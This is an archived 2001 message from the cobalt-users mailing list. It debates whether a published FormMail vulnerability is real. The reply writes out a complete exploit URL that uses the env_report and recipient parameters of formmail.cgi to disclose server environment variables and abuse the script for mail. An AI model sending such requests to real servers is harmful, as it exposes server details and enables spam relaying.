[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [cobalt-users] CGI email

Subject: RE: [cobalt-users] CGI email
From: "Dan Kriwitsky" <webhosting@xxxxxxxxx>
Date: Wed May 9 20:25:00 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

>
http://www.securiteam.com/exploits/FormMail_discloses_environment_variables_
information.html
>
> Geezus! Securiteam.com lets anybody submit a socalled "exploit" and they
> publish it without checking it out????

Checking what out? The expoit they published works.
Exploit:
http://www.example.com/cgi-bin/formmail.cgi?env_report=PATH&recipient=cache@
dowebs.com&required=&firstname=&lastname=&email=&message=&Submit=<message>

> The env_report simply allows the owner of the script, or any other
> approved recipient, to email himself the value of an environment
> variable. It does NOT somehow magically allow the author of the socalled
> exploit, or anyone else, to email himself that value, or anything else.

He doesn't have to email himself anything. All the spammer needs to do is as
above.

--
Dan Kriwitsky

Follow-Ups:
- Re: [cobalt-users] CGI email
  - From: Keith Davis

References:
- Re: [cobalt-users] CGI email
  - From: Keith Davis

Prev by Date: Re: [cobalt-users] [raq2] restore raq2 without the restore cd
Next by Date: Re: [cobalt-users] Automating ftp
Previous by thread: Re: [cobalt-users] CGI email
Next by thread: Re: [cobalt-users] CGI email

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index